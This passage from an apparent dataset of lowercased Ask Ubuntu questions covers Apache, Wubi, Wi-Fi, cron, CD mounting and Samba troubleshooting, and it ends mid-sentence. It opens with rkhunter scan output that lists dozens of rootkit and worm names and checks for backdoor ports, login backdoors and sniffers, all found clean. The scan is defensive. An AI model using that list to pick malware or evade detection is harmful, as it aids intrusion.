[ not found ] intoxonia-ng rootkit [ not found ] irix rootkit [ not found ] kitko rootkit [ not found ] knark rootkit [ not found ] ld-linuxv.so rootkit [ not found ] li0n worm [ not found ] lockit / ljk2 rootkit [ not found ] mood-nt rootkit [ not found ] mrk rootkit [ not found ] ni0 rootkit [ not found ] ohhara rootkit [ not found ] optic kit ( tux ) worm [ not found ] oz rootkit [ not found ] phalanx rootkit [ not found ] phalanx2 rootkit [ not found ] phalanx2 rootkit ( extended tests ) [ not found ] portacelo rootkit [ not found ] r3dstorm toolkit [ not found ] rh-sharpe 's rootkit [ not found ] rsha 's rootkit [ not found ] scalper worm [ not found ] sebek lkm [ not found ] shutdown rootkit [ not found ] shv4 rootkit [ not found ] shv5 rootkit [ not found ] sin rootkit [ not found ] slapper worm [ not found ] sneakin rootkit [ not found ] 'spanish ' rootkit [ not found ] suckit rootkit [ not found ] sunos rootkit [ not found ] sunos / nsdap rootkit [ not found ] superkit rootkit [ not found ] tbd ( telnet backdoor ) [ not found ] telekit rootkit [ not found ] t0rn rootkit [ not found ] trnkit rootkit [ not found ] trojanit kit [ not found ] tuxtendo rootkit [ not found ] urk rootkit [ not found ] vampire rootkit [ not found ] vckit rootkit [ not found ] volc rootkit [ not found ] xzibit rootkit [ not found ] x-org sunos rootkit [ not found ] zarwt.kit rootkit [ not found ] zk rootkit [ not found ] performing additional rootkit checks suckit rookit additional checks [ ok ] checking for possible rootkit files and directories [ none found ] checking for possible rootkit strings [ none found ] performing malware checks checking running processes for suspicious files [ none found ] checking for login backdoors [ none found ] checking for suspicious directories [ none found ] checking for sniffer log files [ none found ] performing linux specific checks checking loaded kernel modules [ ok ] checking kernel module names [ ok ] [ press < enter > to continue ] checking the network ... performing checks on the network ports checking for backdoor ports [ none found ] checking for hidden ports [ skipped ] performing checks on the network interfaces checking for promiscuous interfaces [ none found ] checking the local host ... performing system boot checks checking for local host name [ found ] checking for system startup files [ found ] checking system startup files for malware [ none found ] performing group and account checks checking for passwd file [ found ] checking for root equivalent ( uid 0 ) accounts [ none found ] checking for passwordless accounts [ none found ] checking for passwd file changes [ warning ] checking for group file changes [ warning ] checking root account shell history files [ none found ] performing system configuration file checks checking for ssh configuration file [ not found ] checking for running syslog daemon [ found ] checking for syslog configuration file [ found ] checking if syslog remote logging is allowed [ not allowed ] performing filesystem checks checking /dev for suspicious file types [ none found ] checking for hidden files and directories [ warning ] [ press < enter > to continue ] system checks summary ===================== file properties checks ... required commands check failed files checked : 135 suspect files : 7 rootkit checks ... rootkits checked : 242 possible rootkits : 0 applications checks ... all checks skipped the system checks took : 2 minutes and 16 seconds all results have been written to the log file ( /var/log/rkhunter.log ) one or more warnings have been found while checking the system . please check the log file ( /var/log/rkhunter.log ) bog @ bog-compaq-presario-cq60-notebook-pc : ~ $
440133	document root not exists ?	i need some help figuring why apache tells me that my document root does not exists . my document root is /home/user/documents/git/site/index.html ... it is there ! my vhost looks like < virtualhost *:80 > servername site.com documentroot /home/user/documents/git/site/index.html errorlog /home/user/documents/git/site/error.log < directory /home/user/documents/git/site > require all granted < /directory > < /virtualhost > permissions are 775 for git and its subfolders and files and in my hosts 127.0.0.1 site.com what am i doing wrong ?
440135	problem in installing ubuntu 12.04.4 with wubi	hey i was trying to install ubuntu 12.04.4 64 bit with wubi and i am facing 2 problems so i downloaded ubuntu iso and wubi of same versions after that i pasted both ubuntu iso and wubi in same folder and than started installation on my c : disk and its installed without any error and then i rebooted and when the ubuntu opens it 's showing a error that `` no root filesystem found '' . so thats my first problem . now i am gon na talk about my 2nd problem . in this i tried to install ubuntu with wubi in other hard disk partitions like d : f : and while i was installing through wubi its gives me error that is given below error executing command command=c : \windows\system32\bcdedit.exe /set { 8bad8de1-974c-11e3-9803-d1f0e415df87 } device partition=e : retval=1 stderr=an error has occurred setting the element data . the request is not supported . plz help me
440139	which tls protocols are enabled in ubuntu 14.04 's openssl ?	this is a follow up to override distro package with custom package ? . does anyone know if ubuntu 14.04 's openssl enables all tls protocols ( tls1.0 , tls1.1 and tls1.2 ) ? or does it have protocols disabled ( tls1.1 and tls1.2 ) like past versions ? related : how does one even check for this sort of thing ? edit : this is not a bug report question ; nor is it a developer question . you guys are taking the `` close as bug report '' much too far .
440142	launch app only if not already open	i would like to mimic the use of alfred on mac os x , where if you try to open an app after searching for it , it will only open a new window if the program is not already running , otherwise it will set the focus on the currently running instance of that application . is there anyway to change the default behavior of the launcher to check for this before opening a new window ?
440146	can i change the theme for only one program in ubuntu 13.10 ?	i want to change the theme that inkscape uses to a dark one , but i want the rest of the programs i use to retain the theme they currently have . i found this article ( http : //urukrama.wordpress.com/2008/07/13/setting-a-custom-gtk-theme-for-specific-applications/ ) but it seems to be outdated and does n't work for me . i 'm running ubuntu 13.10 and the version of inkscape i 'm trying to apply a different theme to is 0.48.4 . i can change the theme of inkscape by changing the global theme using unity tweak tool , but then all other programs change too . also , if there 's any way to change the icon set for a specific application , i would like to do that as well .
440147	trying to copy file from desktop to usr/share/audacious/skins using terminal . what am i doing wrong ?	i have a folder called grey on my desktop . i want to either copy or move it to usr/share/audacious/skins and it keeps telling me there is no such file or directory . it 's there , on the desktop , why does it keep telling me it 's not . i tried this : noyfb @ noyfb-latitude-d630 : ~ $ sudo cp home/noyfb/desktop/grey usr/share/audacious/grey [ sudo ] password for noyfb : cp : can not stat `home/noyfb/desktop/grey ' : no such file or directory then this noyfb @ noyfb-latitude-d630 : ~ $ sudo cp /home/noyfb/desktop/grey /usr/share/audacious/grey cp : can not stat `/home/noyfb/desktop/grey ' : no such file or directory then this noyfb @ noyfb-latitude-d630 : ~ $ sudo mv /home/noyfb/desktop/grey /usr/share/audacious/skins/grey mv : can not stat `/home/noyfb/grey ' : no such file or directory anyone know what i 'm doing wrong ?
440154	problems mounting cd/dvd	i 'm facing issues when using by very first time my cd/dvd drive in linux . back when i had linux , it worked normal , cd/dvd rw , but since i did n't use it much , i just removed it from the laptop ( you know , i have a hp pavilion dv4 , those ones you can remove safely the cd/dvd unit from , and place a protector instead , to decrease weight ) . i just connected it again when i needed to use it , and it was ok . couple of months ago i started using linux , first ubuntu 12.04 , and then i 'm in elementaryos luna ( ubuntu based ) , and no problems at all , except for today , that i needed to use my unit and it did n't work . ( need to say here , i installed both versions , unity and eos w/out the unit in place , so i guess that messed up some configuration files from the very start ) i have done some research , and some useful info is here , ( note : during all the terminal commands , there was a cd in the unit ) i guess this one is to look up for drives ? ~ $ wodim -- devices wodim : overview of accessible drives ( 1 found ) : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - 0 dev='/dev/sg1 ' rwrw -- : 'hp ' 'bd rom bc-5501s' -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - ~ $ mount '/dev/sg1' mount : ca n't find /dev/sg1 in /etc/fstab or /etc/mtab here the /dev dir cdrom , cdrw , dcd and dvdrw , and some others , are in pink , is that normal ? ~ $ ls /dev autofs mcelog sda2 tty30 tty63 ttys9 block mem sda5 tty31 tty7 uinput bsg net sg0 tty32 tty8 urandom btrfs-control network_latency sg1 tty33 tty9 usbmon0 bus network_throughput shm tty34 ttyprintk usbmon1 cdrom null snapshot tty35 ttys0 usbmon2 cdrw nvidia0 snd tty36 ttys1 usbmon3 char nvidiactl sr0 tty37 ttys10 usbmon4 console oldmem stderr tty38 ttys11 usbmon5 core port stdin tty39 ttys12 usbmon6 cpu ppp stdout tty4 ttys13 usbmon7 cpu_dma_latency psaux tty tty40 ttys14 v4l disk ptmx tty0 tty41 ttys15 vcs dvd pts tty1 tty42 ttys16 vcs1 dvdrw ram0 tty10 tty43 ttys17 vcs2 ecryptfs ram1 tty11 tty44 ttys18 vcs3 fd ram10 tty12 tty45 ttys19 vcs4 freefall ram11 tty13 tty46 ttys2 vcs5 full ram12 tty14 tty47 ttys20 vcs6 fuse ram13 tty15 tty48 ttys21 vcs7 hidraw0 ram14 tty16 tty49 ttys22 vcsa hpet ram15 tty17 tty5 ttys23 vcsa1 input ram2 tty18 tty50 ttys24 vcsa2 kmsg ram3 tty19 tty51 ttys25 vcsa3 lirc0 ram4 tty2 tty52 ttys26 vcsa4 log ram5 tty20 tty53 ttys27 vcsa5 loop0 ram6 tty21 tty54 ttys28 vcsa6 loop1 ram7 tty22 tty55 ttys29 vcsa7 loop2 ram8 tty23 tty56 ttys3 vga_arbiter loop3 ram9 tty24 tty57 ttys30 video0 loop4 random tty25 tty58 ttys31 zero loop5 rfkill tty26 tty59 ttys4 loop6 rtc tty27 tty6 ttys5 loop7 rtc0 tty28 tty60 ttys6 loop-control sda tty29 tty61 ttys7 mapper sda1 tty3 tty62 ttys8 trying to mount manually ~ $ sudo mkdir /mnt/dvdrw ~ $ sudo mount /dev/dvdrw /mnt/dvdrw mount : /dev/sr0 already mounted or /mnt/dvdrw busy ~ $ man mount ~ $ sudo mkdir /mnt/dvd ~ $ sudo mount /dev/dvd /mnt/dvd mount : no medium found on /dev/sr0 ~ $ sudo mkdir /mnt/cdrom ~ $ sudo mount /dev/cdrom /mnt/cdrom mount : no medium found on /dev/sr0 ~ $ sudo mkdir /mnt/cdrw ~ $ sudo mount /dev/cdrw /mnt/cdrw mount : no medium found on /dev/sr0 blkid ~ $ sudo blkid /dev/sda1 : uuid= '' e6ef2898-5744-44bc-a9da-65d32f3bab1d '' type= '' ext4 '' /dev/sda5 : uuid= '' c953e0d7-fe23-4514-a579-de52a0be47a6 '' type= '' swap '' ... and lshw ~ $ sudo lshw pci ( sysfs ) ... lots of info ... *-cdrom description : dvd-ram writer product : bd rom bc-5501s vendor : hp physical id : 1 bus info : scsi @ 1:0.0.0 logical name : /dev/cdrom logical name : /dev/cdrw logical name : /dev/dvd logical name : /dev/dvdrw logical name : /dev/sr0 version : 1.86 capabilities : removable audio cd-r cd-rw dvd dvd-r dvd-ram configuration : ansiversion=5 status=nodisc ... more info ... here an important file i did n't know about , fstab ~ $ cat /etc/fstab # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda1 during installation uuid=e6ef2898-5744-44bc-a9da-65d32f3bab1d / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation uuid=c953e0d7-fe23-4514-a579-de52a0be47a6 none swap sw 0 0 and trying again to mount manually ... ~ $ sudo mount /media/cdrom0/ -o unhide mount : ca n't find /media/cdrom0/ in /etc/fstab or /etc/mtab ~ $ sudo mount /dev/cdrom /media/cdrom mount : mount point /media/cdrom does not exist ~ $ sudo mount /dev/cd /media/cdrom mount : mount point /media/cdrom does not exist ~ $ sudo mount /dev/cdrw /media/cdrom mount : mount point /media/cdrom does not exist ~ $ sudo mount /dev/dvd /media/cdrom mount : mount point /media/cdrom does not exist ~ $ sudo mount /dev/dvdrw /media/cdrom mount : mount point /media/cdrom does not exist ~ $ sudo mount /dev/sr0 /media/cdrom mount : mount point /media/cdrom does not exist any help to get my unit mount correctly cd/dvd ? thanks in advance .
440155	conexant multi-stream	in windows , the conexant smartaudio driver lets me enable multi-stream mode , which lets me play one audio stream through the headphones , and a different stream through the speakers at the same time . is there a way to do this through pulseaudio/alsa ? this also lets me , i.e . in audacity , quickly switch output between headphones and speakers within the app . in ubuntu , however , all of the output options in audacity just play to the headphones . output of pacmd list-sinks shows both the headphones and speaker ports , but only one of them is ever marked as available at a time . ubuntu 13.10 x64 on a lenovo t420 . note : i 'm not looking for stereo mix , nor am i looking for outputting the same stream to multiple outputs , i want different streams .
440157	kernel module getting loaded automatically	when i do rmmod usb_storage and then dmesg i can see the output saying usb_storage deregistered . but when i attach a flash drive and then dmesg , it says initializing usb mass storage driver ... [ 16565.129239 ] scsi41 : usb-storage 1-1:1.0 [ 16565.130134 ] usbcore : registered new interface driver usb-storage [ 16565.130172 ] usb mass storage support registered . i dont understand how does it automatically get loaded ?
440158	wireless not working - asus x450j - qualcomm atheros	i just did a clean install , overwriting my old windows . i 'm pretty much a novice and do n't know where to start . i 've tried reading a few answers that seemed relevant but find it all a bit confusing , the people asking seem to have a better grasp on using terminal code etc than i do and i do n't want to take any risks . currently , i 'm doing a full update using an ethernet cable - hoping that might fix it but suspect from the questions i 've seen on my adapter it probably wo n't . my wireless adapter is a qualcomm atheros ar9485 wireless network adapter . when i go into the network setting and try to turn on the wireless it turns on for half a second then turns off . bearing in mind i am a complete novice , is anyone able to assist in getting the wireless working ? hardware details : connor @ connor-x450jf : ~ $ sudo lspci -nn [ sudo ] password for connor : 00:00.0 host bridge [ 0600 ] : intel corporation xeon e3-1200 v3/4th gen core processor dram controller [ 8086:0c04 ] ( rev 06 ) 00:01.0 pci bridge [ 0604 ] : intel corporation xeon e3-1200 v3/4th gen core processor pci express x16 controller [ 8086:0c01 ] ( rev 06 ) 00:02.0 vga compatible controller [ 0300 ] : intel corporation 4th gen core processor integrated graphics controller [ 8086:0416 ] ( rev 06 ) 00:03.0 audio device [ 0403 ] : intel corporation xeon e3-1200 v3/4th gen core processor hd audio controller [ 8086:0c0c ] ( rev 06 ) 00:14.0 usb controller [ 0c03 ] : intel corporation 8 series/c220 series chipset family usb xhci [ 8086:8c31 ] ( rev 04 ) 00:16.0 communication controller [ 0780 ] : intel corporation 8 series/c220 series chipset family mei controller # 1 [ 8086:8c3a ] ( rev 04 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation 8 series/c220 series chipset family usb ehci # 2 [ 8086:8c2d ] ( rev 04 ) 00:1b.0 audio device [ 0403 ] : intel corporation 8 series/c220 series chipset high definition audio controller [ 8086:8c20 ] ( rev 04 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation 8 series/c220 series chipset family pci express root port # 1 [ 8086:8c10 ] ( rev d4 ) 00:1c.2 pci bridge [ 0604 ] : intel corporation 8 series/c220 series chipset family pci express root port # 3 [ 8086:8c14 ] ( rev d4 ) 00:1c.3 pci bridge [ 0604 ] : intel corporation 8 series/c220 series chipset family pci express root port # 4 [ 8086:8c16 ] ( rev d4 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation 8 series/c220 series chipset family usb ehci # 1 [ 8086:8c26 ] ( rev 04 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation hm86 express lpc controller [ 8086:8c49 ] ( rev 04 ) 00:1f.2 sata controller [ 0106 ] : intel corporation 8 series/c220 series chipset family 6-port sata controller 1 [ ahci mode ] [ 8086:8c03 ] ( rev 04 ) 00:1f.3 smbus [ 0c05 ] : intel corporation 8 series/c220 series chipset family smbus controller [ 8086:8c22 ] ( rev 04 ) 01:00.0 3d controller [ 0302 ] : nvidia corporation gk107m [ geforce gt 745m ] [ 10de:0fe3 ] ( rev a1 ) 03:00.0 network controller [ 0280 ] : qualcomm atheros ar9485 wireless network adapter [ 168c:0032 ] ( rev 01 ) 04:00.0 ethernet controller [ 0200 ] : qualcomm atheros qca8171 gigabit ethernet [ 1969:10a1 ] ( rev 10 ) rfkill list connor @ connor-x450jf : ~ $ rfkill list 0 : acer-wireless : wireless lan soft blocked : yes hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : no upd : tried rfkill unblock 0 no output to report , wireless still can not be enabled tried rfkill unblock acer-wirelessgave output bogus unblock argument 'acer-wireless ' . upd : installed ubuntu 13.10 from the website - here is the output from if config eth0 link encap : ethernet hwaddr 74 : d0:2b : e7:1f:8c up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:19 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:882 errors:0 dropped:0 overruns:0 frame:0 tx packets:882 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:84283 ( 84.2 kb ) tx bytes:84283 ( 84.2 kb ) usb0 link encap : ethernet hwaddr fa : b6 : e0 : ab : ce:3a inet addr:192.168.42.17 bcast:192.168.42.255 mask:255.255.255.0 inet6 addr : fe80 : :f8b6 : e0ff : feab : ce3a/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:2754 errors:2 dropped:0 overruns:0 frame:2 tx packets:2673 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2204062 ( 2.2 mb ) tx bytes:488800 ( 488.8 kb ) here 's iwconfig usb0 no wireless extensions . eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=16 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : off the rfkill list : 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : acer-wireless : wireless lan soft blocked : yes hard blocked : no so i ran sudo rfkill unblock all and nothing happened : connor @ connor : ~ $ sudo rfkill unblock all connor @ connor : ~ $ rfkill list 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : acer-wireless : wireless lan soft blocked : yes hard blocked : no upd : using this troubleshooting guide i ran sudo lshw here is the output : configuration : driver=pcieport resources : irq:18 memory : f7900000-f79fffff *-network disabled description : wireless interface product : ar9485 wireless network adapter vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 01 serial : 24 : fd:52:79:9c:53 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list rom ethernet physical wireless i ca n't make heads or tails of it . anyone else ? is driver=pcieport even a driver ? a million rep points from me for danatela - how can i reward this wonderful human being for all his/her help ?
440161	wifi is disconnecting after connecting for few seconds and not able to connect it again	i downloaded kubuntu 13.10 on my hp 2202 laptop and the wifi on it does n't work . i 'm running it in parallel with windows 8 , and the wifi works find on windows ( as it has always done ) , but in kubuntu it connects for some time ( after restart of pc ) and it will disconnect . but it 's showing the wifi network after it disconnects . if you enter the password again , it also wo n't connect .
440163	user permission - looking for a workaround	i 'm logged in as user 'ip ' . i work on a local drupal installation . the entire directory belongs to 'www-data : www : data ' . to avoid to work at the beginnig with sudo i added user 'ip ' to the 'www-data ' group 'sudo adduser ip www-data' the main problem is that files and directories exist which have 644 or 755 . of course it is possible to move the entire local installation to 777 . but that would be a stupid way i guess . how do i get write permission for 'ip ' on files which belong 'www-data ' whithout changing the default drupal file permissions ?
440166	poor battery life : cron jobs running even in suspend	i was trying to figure out why my battery was dying out really fast even when in suspend mode . i noticed that my cron jobs run even when my laptop is suspended . i do not want this behavior . cron should only run when the pc is awake ans not wake it up . i also noticed the battery backup going down after i installed mozilla thunderbird . is there any connection/known issue ?
440167	directory created from command line not appearing in nautilus	i created a directory from the command line using mkdir but it does not show in the parent directory in nautilus . i can navigate to the created directory in nautilus if i enter the full path . nautilus even auto-completes the directory name as i type it . how can i make nautilus show the new directory ? my nautilus version is 3.4.2 running on ubuntu 12.04 precise pangolin .
440169	my ubuntu 14.04 window controls do n't changes after setting in dconf-editor	how to change window-controls in ubuntu 14.04 ? it 's not changing . please help me .
440174	anacron and suspend	does an cron task , that is run with anacron run even when my system is suspended ? i know that anacron will run a job regardless of whether my system is on or off , but i thought that the jobs get queued up and run when i turn my system on . also , from the anacron docs , anacron runs only those tasks scheduled for daily or less frequent runs . the job in question runs every 20 min . from my log files /var/mail/ i see that the job is run and my statements echoed to stdout are getting mailed to me with the timestamp of when the job was run .
440175	how to install ast2400 video driver	i use the supermicro 5018a-tn4 server however the video resolution does n't show more than 1024x768 . installed is ubuntu 13.10 . how can i install the latest aspeed ast2400 video driver and where can i get it .
440179	connecting to university lan using ubuntu 12.04 server	i have been browsing much of askubuntu and other related forums , but no one quite seems to have the same issue as i have , so my search has not borne fruit of yet . my intention is to set up a ssh server in my dorm room at college that i can connect to from anywhere using the ip of the computer . in setting up the server computer , however , i am able to ping web addresses with 0 % packet loss , but if i attempt to apt-get update or apt-get upgrade all packages fail to be fetched . i use a username and password to connect to lan , but have not been asked for either yet . please let me know if i can post any lines of output to help . lspci and ifconfig have been included , in case they can help . thank you in advance for your help . lspci : 00:00.0 host bridge : intel corporation atom processor d2xxx/n2xxx dram controller ( rev 03 ) 00:02.0 vga compatible controller : intel corporation atom processor d2xxx/n2xxx integrated graphics controller ( rev 09 ) 00:1b.0 audio device : intel corporation nm10/ich7 family high definition audio controller ( rev 02 ) 00:1c.0 pci bridge : intel corporation nm10/ich7 family pci express port 1 ( rev 02 ) 00:1c.1 pci bridge : intel corporation nm10/ich7 family pci express port 2 ( rev 02 ) 00:1c.3 pci bridge : intel corporation nm10/ich7 family pci express port 4 ( rev 02 ) 00:1d.0 usb controller : intel corporation nm10/ich7 family usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation nm10/ich7 family usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation nm10/ich7 family usb uhci controller # 3 ( rev 02 ) 00:1d.7 usb controller : intel corporation nm10/ich7 family usb2 ehci controller ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev e2 ) 00:1f.0 isa bridge : intel corporation nm10 family lpc controller ( rev 02 ) 00:1f.2 ide interface : intel corporation nm10/ich7 family sata controller [ ide mode ] ( rev 02 ) 00:1f.3 smbus : intel corporation nm10/ich7 family smbus controller ( rev 02 ) 02:00.0 network controller : qualcomm atheros ar9485 wireless network adapter ( rev 01 ) 03:00.0 ethernet controller : qualcomm atheros ar8152 v2.0 fast ethernet ( rev c1 ) ifconfig : eth0 link encap : ethernet hwaddr 10 : bf:48:66:44:1b inet addr:10.50.122.193 bcast:10.50.255.255 mask:255.255.0.0 inet6 addr : fe80 : :12bf:48ff : fe66:441b/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:20846 errors:0 dropped:1 overruns:0 frame:0 tx packets:2210 errors:0 dropped:0 overruns:0 carrier:1 collisions:0 txqueuelen:1000 rx bytes:2201114 ( 2.2 mb ) tx bytes:726442 ( 726.4 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b )
440180	installing the amd/ati catalyst drivers for 12.04	i 've tried installing these driver using ever method that i could find . the first way i tried was to just download the drivers from here : http : //support.amd.com/en-us/download/desktop/previous/detail ? os=linux % 20x86 & rev=13.4 i opened the install , selected generate distribution specific driver package , select build package for detected os : ubuntu/precise . it runs and then gives and error `` sorry , a problem occurred while installing software . package : fglrx '' . after that failed tried it again but just used the first option which says `` install driver 13.251 on x.org 6.9 or later 64-bit . i did that , reboot my computer . after rebooting i had the following message on start up : `` the system is running in low-graphics mode '' . i could n't get any of the options in the menus to work and i could only use the computer my computer using the terminal . i tried uninstalling the drivers using many guides i found but i could never get it back to the generic drivers . i thought the quickest thing to do would be to format , reinstall and just install the drivers fresh . after reinstalling the ubuntu , i tried following the following guide : what is the correct way to install propetary ati catalyst video drivers ( fglrx ) directly from amd ? that did n't work . got to the `` sudo dpkg -i *.deb '' command and i get the following error `` error ! bad return status for module build on kernel : 3.11.0-18-generic ( x86_64 ) then i removed everything and tried this guide : http : //wiki.cchtml.com/index.php/ubuntu_precise_installation_guide # using_ubuntu-supplied_fglrx.2fcatalyst this does n't work either . i get the same error from the above one . so i 've been trying to install this driver all day and ca n't figure it out . any help would be appreciated . using : radeon hd 6850 ubuntu 12.04
440181	no sound in ubuntu	to start i know there are a million topics on this but i ca n't seem to get this to work . in short , i 've done most of everything that i 've found and have the same problem as this guy : https : //bbs.archlinux.org/viewtopic.php ? id=159605 this is the only thing i have n't done it seems but there is no pulse folder in .config/ even after reinstalling pulseaudio . any ideas ?
440182	machine check exception	i am running ubuntu server on a dell poweredge server . i found following the log entry from the server dmesg . the dell pro support requested to run dell 's dset diagnostics . they found no hardware problems reported by dset and the support person said that this log message is a reporting problem in ubuntu . can this be a software bug in ubuntu ? thanks sami [ 1457944.748752 ] sbridge : handling mce memory error < br > [ 1457944.748761 ] cpu 1 : machine check exception : 0 bank 10 : 8c000046000800c1 < br > [ 1457944.748763 ] tsc 0 addr 2df41c3000 misc 900080008000c8c processor 0:306e4 time 1395313612 socket 1 apic 20 < br > [ 1457945.659958 ] edac mc1 : 1 ce memory scrubbing error on cpu_srcid # 1_channel # 1_dimm # 0 ( channel:1 slot:0 page:0x2df41c3 offset:0x0 grain:32 syndrome:0x0 - area : dram err_code:0008:00c1 socket:1 channel_mask:1 rank:0 ) < br >
440185	ubuntu booting only when 'something ' is in the cd/dvd rom drive	this might come off a very bizarre problem . i have a dual boot system of ubuntu 12.04 and win 7 loaded using grub2 . all was fine until yesterday when i upgraded my bios . after than grub2 does not move past a blank purple screen , no matter which i option i select , and the fan starts blowing hard . i have already tried adding 'nomodeset ' and removing 'splash quiet ' , etc , but nothing worked . but today morning i inserted a win7 dvd and tried booting . although the dvd did n't boot , i was back at grub and very strangely ubuntu booted up ( fan speed was normal too ) . how do i fix this and what logs could offer info ? i ca n't forever rely on placing a dvd to just bootup from the hdd ! my system has ati switch-able graphics and the bios is in legacy mode . and if i overwrite grub with the windows bootloader , i am able to boot windows but not ubuntu .
440191	problem in downloading any song or movie	i am unable to download any file . i am using ubuntu 12.04 and firefox . the files instead of downloading starts playing online .
440193	ubuntu studio for ubuntu sdk	i have one of the strange question in my mind . i saw ubuntu studio is good for multimedia related thing . i was wondering this thing for past few days . is it possible to install ubuntu sdk in ubuntu studio ? if yes , how it will be helping with development . will be performance will be good in ubuntu studio compared to normal ubuntu . can i develop apps in test them there . will be similar as we develop in ubuntu .
440197	how could i replace alt + tab with something else on 12.04 with gnome 3 ?	i use citrix receiver to access my desktop at my firm . unfortunately both computers have the alt + tab set as application switcher shortcut . as a consequence , when i am using the remote desktop in full screen , hitting alt + tab navigates me out of the remote pc . as a workaround i would like to replace the alt + tap with something like super + tab on the ubuntu/gnome3 host . however changing the shortcut in the keyboard/navigation/switch applications setting has no affect . could you please advise if there is any way i could still change this setting ? best regards , marton
440202	windows 8.1 screen crash after boot from grub	i have a lenovo y510 , and i installed windows 8.1 alongside ubuntu 13.04 , both in legacy mode . now , when i select windows , windows boot animation is damaged and the screen shows incorrect colors . what can i do to solve this problem ? ? thanks
440207	samba error : can not convert name `` everyone '' to a sid . access denied	there is already a question similar but the solution is not working on 14.04 : samba can not share folder - can not convert name `` everyone '' to a sid how to replicate whenever i tried to share a folder with nautilus and click create share i got the following error ( not matter which option i select ) : net usershare ' returned error 255 : net usershare add : can not convert name `` everyone '' to a sid . access denied . i have tried to edit /etc/samba/smb.conf and add the following line in global session : guest account = nobody usershare owner only = false and then sudo service samba restart but it is not solving at all any idea what it is wrong ? here the output of testparm -s load smb config files from /etc/samba/smb.conf rlimit_max : increasing rlimit_max ( 1024 ) to minimum windows limit ( 16384 ) processing section `` [ printers ] '' processing section `` [ print $ ] '' loaded services file ok. server role : role_standalone [ global ] server string = % h server ( samba , ubuntu ) server role = standalone server map to guest = bad user obey pam restrictions = yes pam password change = yes passwd program = /usr/bin/passwd % u passwd chat = *enter\snew\s*\spassword : * % n\n *retype\snew\s*\spassword : * % n\n *password\supdated\ssuccessfully* . unix password sync = yes syslog = 0 log file = /var/log/samba/log. % m max log size = 1000 dns proxy = no usershare allow guests = yes usershare owner only = no panic action = /usr/share/samba/panic-action % d idmap config * : backend = tdb valid users = % s create mask = 0700 directory mask = 0700 [ printers ] comment = all printers path = /var/spool/samba printable = yes print ok = yes browseable = no [ print $ ] comment = printer drivers path = /var/lib/samba/printers here my /etc/samba/smb.conf ( it is default + the above line added ) # # sample configuration file for the samba suite for debian gnu/linux . # # # this is the main samba configuration file . you should read the # smb.conf ( 5 ) manual page in order to understand the options listed # here . samba has a huge number of configurable options most of which # are not shown in this example # # some options that are often worth tuning have been included as # commented-out examples in this file . # - when such options are commented with `` ; '' , the proposed setting # differs from the default samba behaviour # - when commented with `` # '' , the proposed setting is the default # behaviour of samba but the option is considered important # enough to be mentioned here # # note : whenever you modify this file you should run the command # `` testparm '' to check that you have not made any basic syntactic # errors . # ======================= global settings ======================= [ global ] usershare owner only = false guest account = nobody # # browsing/identification # # # # change this to the workgroup/nt-domain name your samba server will part of workgroup = workgroup # server string is the equivalent of the nt description field server string = % h server ( samba , ubuntu ) # windows internet name serving support section : # wins support - tells the nmbd component of samba to enable its wins server # wins support = no # wins server - tells the nmbd components of samba to be a wins client # note : samba can be either a wins server , or a wins client , but not both ; wins server = w.x.y.z # this will prevent nmbd to search for netbios names through dns . dns proxy = no # # # # networking # # # # # the specific set of interfaces / networks to bind to # this can be either the interface name or an ip address/netmask ; # interface names are normally preferred ; interfaces = 127.0.0.0/8 eth0 # only bind to the named interfaces and/or networks ; you must use the # 'interfaces ' option above to use this . # it is recommended that you enable this feature if your samba machine is # not protected by a firewall or is a firewall itself . however , this # option can not handle dynamic or non-broadcast interfaces correctly . ; bind interfaces only = yes # # # # debugging/accounting # # # # # this tells samba to use a separate log file for each machine # that connects log file = /var/log/samba/log. % m # cap the size of the individual log files ( in kib ) . max log size = 1000 # if you want samba to only log through syslog then set the following # parameter to 'yes ' . # syslog only = no # we want samba to log a minimum amount of information to syslog . everything # should go to /var/log/samba/log . { smbd , nmbd } instead . if you want to log # through syslog you should set the following parameter to something higher . syslog = 0 # do something sensible when samba crashes : mail 